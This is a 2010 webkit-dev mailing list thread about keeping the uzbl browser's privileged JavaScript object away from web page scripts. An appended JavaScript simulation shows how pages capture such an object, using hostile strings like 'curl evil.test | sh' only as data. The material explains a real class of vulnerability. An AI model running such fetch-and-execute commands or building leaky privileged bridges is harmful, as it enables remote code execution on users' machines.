Re: [webkit-dev] a simple isolatedworlds alternative for uzbl?
On Wed, 27 Jan 2010 23:01:17 -0800 Adam Barth aba...@webkit.org wrote:
> Getting this right with the approach you seem to be taking is extremely difficult. The problem is not that the local script is untrustworthy. The problem is that the web page it's interacting with might be able to steal its privileges.

Thank you, but can you describe this a bit more? Even if we don't pass around the object or attach it to an object such as document or window, we are still vulnerable? How can the webpage steal privileges?

> Isolated worlds should be implemented in webkitgtk+ thanks to some contributors from Apple. I bet all that's left to do is add an API for accessing the functionality.
>
> The PDF is just being honest when it says reasonable assurance. I'd be extremely skeptical of someone who claims more than reasonable assurance for a commercial-grade system.
>
> Adam

That's good to know. I'm looking forward to it. The reasonable assurance part, does this mean a problem with the design or is this more about potential issues with the (early) implementations?

___
webkit-dev mailing list
webkit-dev@lists.webkit.org
http://lists.webkit.org/mailman/listinfo.cgi/webkit-dev
Re: [webkit-dev] a simple isolatedworlds alternative for uzbl?
On Thu, 28 Jan 2010 08:01:19 -0800 Adam Barth aba...@webkit.org wrote:
> On Thu, Jan 28, 2010 at 12:40 AM, Dieter Plaetinck die...@plaetinck.be wrote:
>> On Wed, 27 Jan 2010 23:01:17 -0800 Adam Barth aba...@webkit.org wrote:
>>> Getting this right with the approach you seem to be taking is extremely difficult. The problem is not that the local script is untrustworthy. The problem is that the web page it's interacting with might be able to steal its privileges.
>>
>> Thank you, but can you describe this a bit more? Even if we don't pass around the object or attach it to an object such as document or window, we are still vulnerable? How can the webpage steal privileges?
>
> For example, the attacker could use some of the techniques described in this paper: http://www.adambarth.com/papers/2009/adida-barth-jackson.pdf

Thanks. Very interesting article. I guess we can only wait for isolatedworlds to appear in the gtk+ port :)

Dieter
[webkit-dev] Extra privileges for local javascripts with WebkitGtk
Hi guys,

for the uzbl browser (www.uzbl.org) we want to give users the ability to execute their own javascripts with extra privileges. Extra privileges = executing uzbl commands, which can do many actions, such as executing shell commands. But at the same time, we want js scripts from the users to be able to modify the DOM of webpages. The extra privileges should obviously never become available to javascripts from websites.

Currently we implemented the so-called Uzbl object, which has a 'run' method. See the 'eval_js' function in http://github.com/Dieterbe/uzbl/blob/master/uzbl-core.c for our current implementation, and 'JAVASCRIPT HELPER OBJECT' at http://github.com/Dieterbe/uzbl/blob/master/README

It was brought to my attention that, given the way js works (you can change core DOM functions such as window.addEventListener or document.createElement), stack/object inspection, and maybe more (mind you: I'm not familiar with how JS works at all, hence this mail), the Uzbl object can leak to the scope of js scripts of websites, which is quite bad. See for a sample exploit: http://lists.uzbl.org/pipermail/uzbl-dev-uzbl.org/2010-January/000586.html

Can you advise us on how to tackle this topic? Is there a clean solution for this problem?

Thanks,
Dieter
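The leak the thread is about, as an added illustration that is not code from uzbl or WebKit and not the exploit linked above. It simulates in plain JavaScript a privileged object (`Uzbl.run`) handed to a user script that shares one JS world with the page: scenario 1 attaches the object to window and a page-installed setter catches the assignment (whether uzbl's real injection path goes through a page-visible setter is an assumption of this simulation); scenario 2 never exposes the object, yet the page's override of `addEventListener` captures the user script's callback and feeds it a fabricated event, so the page chooses the whole argument of `run()`; scenario 3 stands in for an isolated world by giving the user script a private binding of `addEventListener` taken before the page ran, and shows the remaining caveat that a page still controls DOM content. All names (`makeHost`, `makeWindow`, `EVIL_HREF`, the scenario functions) are hypothetical, and the toy window is not a real DOM.

```javascript
'use strict';

// Constructed page-controlled value used in the second and third scenarios.
const EVIL_HREF = 'http://evil.test/#; spawn sh -c "curl evil.test | sh"';

// The host (the browser) grants one privileged object. In uzbl run() would
// execute a command; here it only records what it was asked to run.
function makeHost() {
  const executed = [];
  const Uzbl = Object.freeze({ run(cmd) { executed.push(cmd); } });
  return { Uzbl, executed };
}

// A toy window/document shared by page script and user script: one JS world.
function makeWindow() {
  const listeners = new Map();
  return {
    document: { title: 'Example Domain' },
    addEventListener(type, fn) {
      if (!listeners.has(type)) listeners.set(type, []);
      listeners.get(type).push(fn);
    },
    dispatchEvent(type, ev) {
      for (const fn of listeners.get(type) || []) fn(ev);
    },
  };
}

// Scenario 1: the host attaches the object to window. A setter the page
// defined earlier receives the object at the moment it is assigned.
function leakViaGlobal() {
  const { Uzbl, executed } = makeHost();
  const win = makeWindow();
  let stolen = null;
  // page script runs first and plants an accessor for the expected name
  Object.defineProperty(win, 'Uzbl', { configurable: true, set(v) { stolen = v; } });
  // host injects the helper object by plain assignment (assumption, see lead-in)
  win.Uzbl = Uzbl;
  // page script now owns the privileged object outright
  if (stolen) stolen.run('spawn sh -c "id > /tmp/pwned"');
  return executed;
}

// Scenario 2: the object is only a closure variable of the user script, but
// the user script hands a callback to a DOM function the page has replaced.
// The page keeps the callback and drives it with an event it fabricates.
function leakViaOverriddenDom() {
  const { Uzbl, executed } = makeHost();
  const win = makeWindow();
  const captured = [];
  const realAdd = win.addEventListener;
  win.addEventListener = function (type, fn) {
    captured.push(fn);
    return realAdd.call(this, type, fn);
  };
  // user script: Uzbl never touches window, it lives only in this closure
  ((Uzbl) => {
    win.addEventListener('click', (ev) => Uzbl.run('spawn xdg-open ' + ev.target.href));
  })(Uzbl);
  // page script calls the captured callback directly with its own "event"
  for (const fn of captured) fn({ target: { href: EVIL_HREF } });
  return executed;
}

// Scenario 3: what an isolated world buys, simulated by a private binding of
// addEventListener taken before the page ran. The page's override never sees
// the callback. Caveat: the page still controls the DOM, so a synthetic click
// carrying a page-chosen href still reaches run() through the user's own code.
function isolatedWorldSimulation() {
  const { Uzbl, executed } = makeHost();
  const win = makeWindow();
  const privateAdd = win.addEventListener; // the user world's own wrapper
  const captured = [];
  win.addEventListener = function (type, fn) {
    captured.push(fn);
    return privateAdd.call(this, type, fn);
  };
  ((Uzbl, addEventListener) => {
    addEventListener.call(win, 'click', (ev) => Uzbl.run('spawn xdg-open ' + ev.target.href));
  })(Uzbl, privateAdd);
  const capturedByPage = captured.length; // 0: the override was bypassed
  win.dispatchEvent('click', { target: { href: EVIL_HREF } });
  return { capturedByPage, executed };
}
```

Run it with node; scenario 1 and 2 each end with one page-chosen command in `executed`. Scenario 3 ends with `capturedByPage === 0` and still one executed command, which is the point a practitioner should take from the thread: separate worlds stop the page from capturing the privileged object or the callbacks that close over it, but a user script that builds commands from page data (an href, the document title) remains a confused deputy and has to treat that data as untrusted.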